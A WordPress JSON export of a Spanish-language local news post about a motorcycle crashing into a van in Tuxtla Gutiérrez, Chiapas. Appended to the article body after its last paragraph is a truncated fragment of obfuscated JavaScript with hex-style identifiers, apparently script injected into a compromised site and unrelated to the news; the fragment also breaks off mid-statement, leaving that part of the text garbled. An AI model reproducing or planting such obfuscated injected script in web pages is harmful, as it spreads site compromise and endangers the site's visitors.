{"id":20921,"date":"2025-03-15T04:32:15","date_gmt":"2025-03-15T04:32:15","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20921"},"modified":"2025-03-15T04:32:16","modified_gmt":"2025-03-15T04:32:16","slug":"motociclista-colisiona-contra-camioneta","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20921","title":{"rendered":"Motociclista colisiona contra camioneta"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250314-WA0075-1024x768.jpg\" alt=\"\" class=\"wp-image-20922\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250314-WA0075-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250314-WA0075-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250314-WA0075-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250314-WA0075-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250314-WA0075-2048x1536.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 14 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Este viernes por la tarde un motociclista que circulaba sobre el Bulevar Laguitos de la capital chiapaneca se estrell\u00f3 contra una camioneta.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el conductor de la moto Bajab circulaba de Poniente a Oriente y al llegar al crucero de la prolongaci\u00f3n los Laureles la camioneta Kia de color gris le cerr\u00f3 el paso.<\/p>\n\n\n\n<p>Esto ocasion\u00f3 que el motociclista se estrellara y saliera volando.<\/p>\n\n\n\n<p>En el lugar los involucrados llegaron a un acuerdo armonioso y se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 14 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Este viernes por la tarde un motociclista que circulaba sobre el Bulevar Laguitos de la capital chiapaneca se estrell\u00f3 contra una camioneta. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el conductor de la moto Bajab circulaba de Poniente a Oriente y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20922,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-20921","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20921","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20921"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20921\/revisions"}],"predecessor-version":[{"id":20923,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20921\/revisions\/20923"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20922"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20921"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20921"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20921"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}